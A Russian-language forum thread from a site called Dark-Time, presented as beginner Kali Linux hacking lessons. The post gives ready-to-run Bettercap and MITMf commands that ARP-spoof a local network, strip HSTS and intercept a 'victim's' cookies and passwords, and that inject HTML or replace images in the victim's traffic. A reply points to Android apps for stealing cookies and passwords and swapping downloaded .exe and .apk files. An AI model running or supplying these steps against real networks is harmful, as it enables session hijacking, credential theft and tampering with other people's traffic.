Kali Linux: Уроки взлома (Для новичков).

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Здравствуйте юзеры,
Сегодня научу вас элементарным взломам при помощи утилит Bettercap и MITMf.

Попрошу кулхацкеров не писать "давно уже знал это" или "баян", Статья написана для новичков!

Ну что, погнали?


Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственность за любой возможный вред причиненный вами!
Bettercap

Bettercap - набор инструментов для проведения тестов на безопасность в сети.

И так, приступим, для этого нам понадобится Kali Linux и утилита под названием Bettercap.

Для начала нам нужно узнать IP роутера, для этого откроем терминал и запишем вот эту команду...
route -n

Получив адрес роутера нам нужно узнать адрес жертвы...
nmap -sP 192.168.1.1/24

Дальше, вводим собственно и саму команду для перехвата печенька и паролей...
bettercap --interface eth0 --gateway 192.168.1.1 --target IP ЖЕРТВЫ -X

Поздравляю, перехват куки и паролей начался.


MITMf
Второй способ перехватить куки, это при помощи утилиты MITMf.

MITMf — это фреймворк для атак человек-посередине (Man-In-The-Middle attacks). Этот инструмент основывается на
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
и является попыткой возродить и обновить этот проект.

Цель MITMf — быть инструментом всё-в-одном для сетевых атак и атак человек-по-середине, при этом обновляя и усовершенствую существующие атаки и техники.

Давайте установим MITMf...
sudo apt-get install mitmf mitmflib

Для перехвата куки вводим команду...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА -- target IP ЖЕРТВЫ --ferretng

Перехват начался)
Как перевернуть изображение на 180 градусов?

Что бы перевернуть картинку на 180 градусов, мы будем использовать все тот же MITMf.

Как узнать IP роутера и жертвы вы уже знаете, так что приступим сразу к команде.
Вводим...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --upsidedownternet

Как заменить изображение?

Вводим..
mitmf -i eth0 --spoof --arp --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --imgrand --img-dir ПУТЬ К ПАПКЕ С КАРТИНКОЙ

Инжект в HTML

Для начала нам нужно создать html файл с кодом.
Давайте для примера создадим черную страницу с красным текстом.
Код:
<html>
<body bgcolor="red">
<p><font size="15" color="red">BHF.io</font></p>
</body>
</html>
Сохраним этот файл, и в консоли пишем команду для инжекту...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --inject --html-file 'ПУТЬ К ФАЙЛУ /index.html'

Если постараться, то можно реализовать все это на обычном смартфоне на базе андроид, но об этом в следующий раз.
 

BadZ

VIP

BadZ

VIP
18 Мар 2017
155
72
Можно все проще interceter'ом сделать, под андроидом также interceter (воровать куки и пароли) и Network spoofer (спуфер нужен для подмены видео, картинок, .exe, .apk и тд.)
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя